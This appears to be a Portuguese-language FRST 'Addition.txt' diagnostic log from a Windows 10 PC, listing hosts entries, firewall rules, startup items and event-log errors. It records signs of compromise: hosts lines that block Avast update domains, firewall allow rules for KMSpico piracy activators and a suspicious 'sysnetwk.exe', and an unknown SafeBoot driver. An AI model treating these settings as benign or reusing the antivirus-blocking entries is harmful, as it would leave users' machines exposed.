HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\51730011.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\51730011.sys => ""="Driver"
==================== Associação (Whitelisted) ===============
(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido.)
==================== Internet Explorer confiável/restrito ===============
(Se uma entrada for incluída na fixlist, será removida do Registro.)
==================== Hosts Conteúdo: ==========================
(Se necessário, a diretiva Hosts: pode ser incluída na fixlist para redefinir o Hosts.)
2016-07-16 08:47 - 2017-05-19 09:37 - 00001207 _____ C:\WINDOWS\system32\Drivers\etc\hosts
127.0.0.1 v1.ff.avast.com
127.0.0.1 vlcproxy.ff.avast.com
127.0.0.1 cpm.paneladmin.pro
127.0.0.1 publisher.hmdiadmingate.xyz
127.0.0.1 distribution.hmdiadmingate.xyz
127.0.0.1 hmdicrewtracksystem.xyz
127.0.0.1 linkmate.space
127.0.0.1 space1.adminpressure.space
127.0.0.1 trackpressure.website
127.0.0.1 doctorlink.space
127.0.0.1 dscdn.pw
127.0.0.1 beautifllink.xyz
==================== Outras Áreas ============================
(Atualmente não há nenhuma correção automática para esta seção.)
HKU\S-1-5-21-1810685751-3673504307-3616125758-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Note\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
DNS Servers: 192.168.25.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Firewall do Windows está habilitado.
==================== MSCONFIG/TASK MANAGER ítens desabilitados ==
HKLM\...\StartupApproved\Run32: => "PWRISOVM.EXE"
HKU\S-1-5-21-1810685751-3673504307-3616125758-1001\...\StartupApproved\Run: => "GUDelayStartup"
HKU\S-1-5-21-1810685751-3673504307-3616125758-1001\...\StartupApproved\Run: => "GoogleChromeAutoLaunch_10799480DB499B38AC0891F1739CB28D"
HKU\S-1-5-21-1810685751-3673504307-3616125758-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-1810685751-3673504307-3616125758-1001\...\StartupApproved\Run: => "Spotify Web Helper"
HKU\S-1-5-21-1810685751-3673504307-3616125758-1001\...\StartupApproved\Run: => "Discord"
==================== Regras do Firewall (Whitelisted) ===============
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
FirewallRules: [{7B23D4C5-4994-41A2-9CFE-C981C26E31E5}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\H1Z1 King of the Kill\LaunchPad.exe
FirewallRules: [{4A1AE54F-3353-4000-9B40-6E0E1818A17C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\H1Z1 King of the Kill\LaunchPad.exe
FirewallRules: [{564A310C-6596-4F37-BEAC-993441E69895}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{E69F83D3-6CED-48B4-B3C9-C8A3A88EF08D}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{124D154A-1170-48A7-B483-8CBA2780F3D0}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [UDP Query User{4CD86F4E-631A-4F98-A702-CDB4A7267BF2}C:\users\note\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\note\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{E0477992-A221-49D1-96D3-206E3D1860EC}C:\users\note\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\note\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{5DCF4FCD-46E4-45B2-8942-7BCD60A59F58}C:\users\note\appdata\local\popcorn-time\popcorn-time.exe] => (Allow) C:\users\note\appdata\local\popcorn-time\popcorn-time.exe
FirewallRules: [TCP Query User{965F6266-EC3E-48E3-9E93-1D81427EE404}C:\users\note\appdata\local\popcorn-time\popcorn-time.exe] => (Allow) C:\users\note\appdata\local\popcorn-time\popcorn-time.exe
FirewallRules: [UDP Query User{2C181B2E-E016-4638-8B67-D958FFFF44BA}C:\program files (x86)\steam\steamapps\common\lms\lms.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\lms\lms.exe
FirewallRules: [TCP Query User{0AB08635-6128-4708-9699-0ADB49B27785}C:\program files (x86)\steam\steamapps\common\lms\lms.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\lms\lms.exe
FirewallRules: [{EE156857-AD31-489F-8CAA-D5A44FF67578}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{AD21115A-F004-4B37-97E4-94B9D2D3DF5C}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{A259EB4F-1928-48FB-85BF-684B72912942}] => (Allow) C:\Users\Note\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{F6B390A4-4480-4338-A720-521E0E8598FD}] => (Allow) C:\Users\Note\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{3455062D-F720-4472-9F8A-50EF7B03FACC}] => (Allow) C:\Users\Note\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{E504E2C6-F1F7-4F75-A91D-4326F424C6D3}] => (Allow) C:\Users\Note\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{D5993570-4E50-4F9D-A5B9-576198335F8B}] => (Allow) C:\Users\Note\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{B7638D25-936D-46AF-AFA4-A46E258495E4}] => (Allow) C:\Users\Note\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [UDP Query User{188A30BB-C918-4DA5-B9AB-FAC94BB981AE}C:\program files (x86)\overwatch\overwatch.exe] => (Allow) C:\program files (x86)\overwatch\overwatch.exe
FirewallRules: [TCP Query User{02094F61-C6DB-491A-9E53-872B2B1749F1}C:\program files (x86)\overwatch\overwatch.exe] => (Allow) C:\program files (x86)\overwatch\overwatch.exe
FirewallRules: [{E42EFB6C-C33A-43D9-93F1-62A450377498}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{91F5C06E-511C-420C-B2A5-EAF481ABB913}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [UDP Query User{A1A7FA87-BD00-41F9-BD15-B0311FF45829}C:\program files (x86)\steam\steamapps\common\h1z1 king of the kill\h1z1.exe] => (Block) C:\program files (x86)\steam\steamapps\common\h1z1 king of the kill\h1z1.exe
FirewallRules: [TCP Query User{751AAF85-EEAE-4739-962C-ADD10C805EEA}C:\program files (x86)\steam\steamapps\common\h1z1 king of the kill\h1z1.exe] => (Block) C:\program files (x86)\steam\steamapps\common\h1z1 king of the kill\h1z1.exe
FirewallRules: [{A2BF6C76-77C2-46EF-8CDF-F3E70F39C75F}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{CC677011-9B9C-43AF-A775-3C4E049B42FE}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{D38F2697-9DD1-489E-B9E2-D831C37DD82E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{9A2D81A6-4A06-4334-80AF-77A2F0F8EC14}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{2799B2D9-5F3A-4059-8514-CEBFA3E4ADD2}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{46023E59-3228-46D3-B974-4D4487520DCC}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{34045F41-034B-4C7A-807B-B65EFE89F90B}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{117548CA-3C9D-445A-9A81-EC485600471C}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{BD096F52-D6B9-4EC9-A0CD-12E98DEEA492}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{E2A7F171-D8DD-4F70-87A1-D0B2EC2B0C9D}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{724D7AA3-125F-4D24-9471-12CF6E4F22DA}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{51654A73-F7FC-4752-BD52-2028803E32CB}] => (Allow) C:\Windows\KMS-R@1n.exe
FirewallRules: [{C5671932-9BAE-43D2-86C1-BDD0E9AB2AE5}] => (Allow) C:\Windows\KMS-R@1n.exe
FirewallRules: [TCP Query User{D3CC885A-4104-4573-B70F-398581B5E9E2}C:\program files (x86)\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe
FirewallRules: [UDP Query User{10301D1E-3A3D-4F54-895D-740E6287160F}C:\program files (x86)\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe
FirewallRules: [TCP Query User{6E80CB29-DD0F-4AFE-8702-778BF104AA38}C:\program files (x86)\steam\steamapps\common\pubg_test\tslgame\binaries\win64\tslgame.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\pubg_test\tslgame\binaries\win64\tslgame.exe
FirewallRules: [UDP Query User{C15695B8-E15C-4EDB-A226-7152D69B34AB}C:\program files (x86)\steam\steamapps\common\pubg_test\tslgame\binaries\win64\tslgame.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\pubg_test\tslgame\binaries\win64\tslgame.exe
FirewallRules: [{1A9A1B94-3042-4A38-AA0D-DE03E14C393F}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [TCP Query User{A5E1CC36-144C-4F32-B688-D8D6C0FBFBE3}C:\program files (x86)\grand theft auto v\gta5.exe] => (Allow) C:\program files (x86)\grand theft auto v\gta5.exe
FirewallRules: [UDP Query User{78AC0542-72BD-4E21-BDFA-1B11E86E6AE0}C:\program files (x86)\grand theft auto v\gta5.exe] => (Allow) C:\program files (x86)\grand theft auto v\gta5.exe
FirewallRules: [{522772FF-1853-42E9-9BCC-00670C5038F0}] => (Allow) C:\Program Files\KMSpico\KMSELDI.exe
FirewallRules: [{AF565BAE-0682-4AEC-A404-15F647268419}] => (Allow) C:\Program Files\KMSpico\KMSELDI.exe
FirewallRules: [{11A3380A-9E86-4176-B7F3-22141D67951B}] => (Allow) C:\Program Files\KMSpico\AutoPico.exe
FirewallRules: [{2D607491-09AA-4DAD-AAB7-CA780E6B3C03}] => (Allow) C:\Program Files\KMSpico\AutoPico.exe
FirewallRules: [{7CFE7110-14AF-4208-A1E0-31C92E4905C1}] => (Allow) C:\ProgramData\Microsoft\Network\Dsq\network\sysnetwk.exe
FirewallRules: [{3DA6A251-5EB0-4F3B-9696-E10004C979C5}] => (Allow) C:\WINDOWS\system32\rundll32.exe
FirewallRules: [{C88C6CD1-B128-4CDC-8D0D-83E8C8352AB3}] => (Allow) C:\Program Files\KMSpico\Service_KMS.exe
FirewallRules: [{0077B118-77A5-4419-832E-D50F74E7A7DC}] => (Allow) C:\Program Files\KMSpico\Service_KMS.exe
FirewallRules: [{36112208-F519-4796-B447-67C51D963D60}] => (Allow) C:\Windows\System32\rundll32.exe
FirewallRules: [{21651611-9CC7-4FB8-A9F8-59A08DF58525}] => (Allow) C:\Windows\System32\rundll32.exe
==================== Pontos de Restauração =========================
19-05-2017 19:42:53 Ponto de Verificação Agendado
==================== Dispositivos Apresentando Falhas No Gerenciador =============
==================== Erros no Log de eventos: =========================
Erros em Aplicativos:
==================
Error: (05/22/2017 08:24:41 AM) (Source: SideBySide) (EventID: 35) (User: )
Description: Falha na geração de contexto de ativação para "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest". Erro no arquivo de manifesto ou de política C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL", na linha 1.
Identidade do componente localizado no manifesto não corresponde à identidade do componente solicitado.
A referência é UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
A definição é UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
Use o arquivo sxstrace.exe para obter um dignóstico detalhado.
Error: (05/22/2017 12:25:37 AM) (Source: SideBySide) (EventID: 35) (User: )
Description: Falha na geração de contexto de ativação para "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest". Erro no arquivo de manifesto ou de política C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL", na linha 1.
Identidade do componente localizado no manifesto não corresponde à identidade do componente solicitado.
A referência é UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
A definição é UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
Use o arquivo sxstrace.exe para obter um dignóstico detalhado.
Error: (05/19/2017 09:33:08 PM) (Source: SideBySide) (EventID: 35) (User: )
Description: Falha na geração de contexto de ativação para "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest". Erro no arquivo de manifesto ou de política C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL", na linha 1.
Identidade do componente localizado no manifesto não corresponde à identidade do componente solicitado.
A referência é UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
A definição é UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
Use o arquivo sxstrace.exe para obter um dignóstico detalhado.
Error: (05/19/2017 05:45:28 PM) (Source: KMS-QAD) (EventID: 1001) (User: )
Description: Event-ID 1001
Error: (05/19/2017 05:45:28 PM) (Source: DPTF) (EventID: 256) (User: )
Description: Intel(R) Dynamic Platform and Thermal Framework : ESIF(8.2.10900.330) TYPE: ERROR MODULE: DPTF TIME 36419 ms
DPTF Build Version: 8.2.10900.330
DPTF Build Date: May 16 2016 11:32:37
Source File: ..\..\..\Sources\Manager\WIPolicyActiveRelationshipTableChanged.cpp @ line 52
Executing Function: WIPolicyActiveRelationshipTableChanged::execute
Message: Unhandled exception caught during execution of work item
Framework Event: PolicyActiveRelationshipTableChanged [44]
Policy: Active Policy [0]
Exception Function: Policy::executePolicyActiveRelationshipTableChanged
Exception Text:
DPTF Build Version: 8.2.10900.330
DPTF Build Date: May 16 2016 11:32:37
Source File: ..\..\..\Sources\Manager\EsifServices.cpp @ line 457
Executing Function: EsifServices::primitiveExecuteGet
Message: Error returned from ESIF services interface function call
Participant: NoParticipant
Domain: NoDomain
ESIF Primitive: GET_ACTIVE_RELATIONSHIP_TABLE [89]
ESIF Instance: 255
ESIF Return Code: ESIF_E_UNSUPPORTED_ACTION_TYPE [1202]
Error: (05/19/2017 05:45:28 PM) (Source: DPTF) (EventID: 256) (User: )
Description: Intel(R) Dynamic Platform and Thermal Framework : ESIF(8.2.10900.330) TYPE: ERROR MODULE: DPTF TIME 36416 ms
DPTF Build Version: 8.2.10900.330
DPTF Build Date: May 16 2016 11:32:37
Source File: ..\..\..\Sources\Manager\WIPolicyActiveRelationshipTableChanged.cpp @ line 52
Executing Function: WIPolicyActiveRelationshipTableChanged::execute
Message: Unhandled exception caught during execution of work item
Framework Event: PolicyActiveRelationshipTableChanged [44]
Policy: Active Policy [0]
Exception Function: Policy::executePolicyActiveRelationshipTableChanged
Exception Text:
DPTF Build Version: 8.2.10900.330
DPTF Build Date: May 16 2016 11:32:37
Source File: ..\..\..\Sources\Manager\EsifServices.cpp @ line 457
Executing Function: EsifServices::primitiveExecuteGet
Message: Error returned from ESIF services interface function call
Participant: NoParticipant
Domain: NoDomain
ESIF Primitive: GET_ACTIVE_RELATIONSHIP_TABLE [89]
ESIF Instance: 255
ESIF Return Code: ESIF_E_UNSUPPORTED_ACTION_TYPE [1202]
Error: (05/19/2017 05:45:28 PM) (Source: DPTF) (EventID: 256) (User: )
Description: Intel(R) Dynamic Platform and Thermal Framework : ESIF(8.2.10900.330) TYPE: ERROR MODULE: DPTF TIME 36349 ms
DPTF Build Version: 8.2.10900.330
DPTF Build Date: May 16 2016 11:32:37
Source File: ..\..\..\Sources\Manager\WIPolicyActiveRelationshipTableChanged.cpp @ line 52
Executing Function: WIPolicyActiveRelationshipTableChanged::execute
Message: Unhandled exception caught during execution of work item
Framework Event: PolicyActiveRelationshipTableChanged [44]
Policy: Active Policy [0]
Exception Function: Policy::executePolicyActiveRelationshipTableChanged
Exception Text:
DPTF Build Version: 8.2.10900.330
DPTF Build Date: May 16 2016 11:32:37
Source File: ..\..\..\Sources\Manager\EsifServices.cpp @ line 457
Executing Function: EsifServices::primitiveExecuteGet
Message: Error returned from ESIF services interface function call
Participant: NoParticipant
Domain: NoDomain
ESIF Primitive: GET_ACTIVE_RELATIONSHIP_TABLE [89]
ESIF Instance: 255
ESIF Return Code: ESIF_E_UNSUPPORTED_ACTION_TYPE [1202]
Error: (05/19/2017 05:38:20 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-8PNOBD0)
Description: Falha na ativação do aplicativo Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI com o erro: -2147023170. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.
Error: (05/19/2017 05:38:18 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome do aplicativo com falha: SearchUI.exe, versão: 10.0.15063.0, carimbo de data/hora: 0x58ccbc95
Nome do módulo com falha: SearchUI.exe, versão: 10.0.15063.0, carimbo de data/hora: 0x58ccbc95
Código de exceção: 0xc000027b
Deslocamento da falha: 0x00000000001ae2e5
ID do processo com falha: 0x2d94
Hora de início do aplicativo com falha: 0x01d2d0dfd94560df
Caminho do aplicativo com falha: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
Caminho do módulo com falha: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
ID do Relatório: b0a3bbe1-f601-4d68-bd36-3557a674951e
Nome completo do pacote com falha: Microsoft.Windows.Cortana_1.8.12.15063_neutral_neutral_cw5n1h2txyewy
ID do aplicativo relativo ao pacote com falha: CortanaUI
Error: (05/19/2017 05:35:11 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Erro do serviço de cópias de sombra de volume: erro inesperado ao chamar a rotina CoCreateInstance. hr = 0x80004002, Não há suporte para esta interface
.
Operação:
Instanciando servidor VSS
Erros de Sistema:
=============
Error: (05/22/2017 12:22:07 AM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: As configurações de permissão específico do aplicativo não concedem permissão Local Ativação para o aplicativo de Servidor COM com CLSID
{D63B10C5-BB46-4990-A94F-E40B9D520160}
e APPID
{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}
ao usuário AUTORIDADE NT\SISTEMA SID (S-1-5-18) do endereço LocalHost (Usando LRPC) que está sendo executado no contêiner de aplicativos Não Disponível SID (Não Disponível). Essa permissão de segurança pode ser modificada com a ferramenta administrativa Serviços de Componentes.
Error: (05/19/2017 05:45:28 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: O serviço KMS-R@1n terminou com o erro:
Parâmetro incorreto.
Error: (05/19/2017 05:45:28 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço CldFlt devido ao seguinte erro:
Não há suporte para o pedido.
Error: (05/19/2017 05:38:36 PM) (Source: Ntfs) (EventID: 55) (User: AUTORIDADE NT)
Description: Corrupção detectada na estrutura do sistema de arquivos, no volume C:.
A MFT (Tabela Mestra de Arquivos) contém um registro de arquivo corrompido. O número de referência do arquivo é 0x1000000042ebf. O nome do arquivo é "\Windows\System32\Windows.UI.BlockedShutdown.dll".
Error: (05/19/2017 05:38:34 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-8PNOBD0)
Description: O servidor {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} não se registrou no DCOM dentro do tempo limite necessário.
Error: (05/19/2017 05:38:34 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-8PNOBD0)
Description: O servidor {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} não se registrou no DCOM dentro do tempo limite necessário.
Error: (05/19/2017 05:38:34 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-8PNOBD0)
Description: O servidor {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} não se registrou no DCOM dentro do tempo limite necessário.
Error: (05/19/2017 05:38:34 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-8PNOBD0)
Description: O servidor {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} não se registrou no DCOM dentro do tempo limite necessário.
Error: (05/19/2017 05:38:34 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-8PNOBD0)
Description: O servidor {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} não se registrou no DCOM dentro do tempo limite necessário.
Error: (05/19/2017 05:38:33 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-8PNOBD0)
Description: O servidor {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} não se registrou no DCOM dentro do tempo limite necessário.
CodeIntegrity:
===================================
Date: 2017-05-19 19:32:43.995
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nvdmi.inf_amd64_323791d5eb27505c\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2017-05-17 12:13:40.579
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nvdmi.inf_amd64_323791d5eb27505c\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2017-05-15 09:56:28.440
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nvdmi.inf_amd64_323791d5eb27505c\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2017-05-11 10:00:26.476
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nvdmi.inf_amd64_323791d5eb27505c\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2017-05-05 18:18:15.227
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nvdmi.inf_amd64_323791d5eb27505c\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2017-05-02 22:50:41.585
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nvdmi.inf_amd64_323791d5eb27505c\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2017-04-27 18:35:27.905
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nvdmi.inf_amd64_323791d5eb27505c\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2017-04-21 14:26:09.987
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nvdmi.inf_amd64_323791d5eb27505c\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2017-04-18 13:56:12.535
Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume4\Windows\System32\DriverStore\FileRepository\nvdmi.inf_amd64_ea62e0c945f71b38\nvinitx.dll that did not meet the Custom 3 / Antimalware signing level requirements.
==================== Informações da Memória ===========================
Processador: Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz
Percentagem de memória em uso: 46%
RAM física total: 8064.97 MB
RAM física disponível: 4277.23 MB
Virtual Total: 12672.97 MB
Virtual disponível: 8718.25 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:930.96 GB) (Free:582.02 GB) NTFS
==================== MBR & Tabela de Partições ==================
========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: D495127E)
Partition: GPT.
==================== Fim de Addition.txt ============================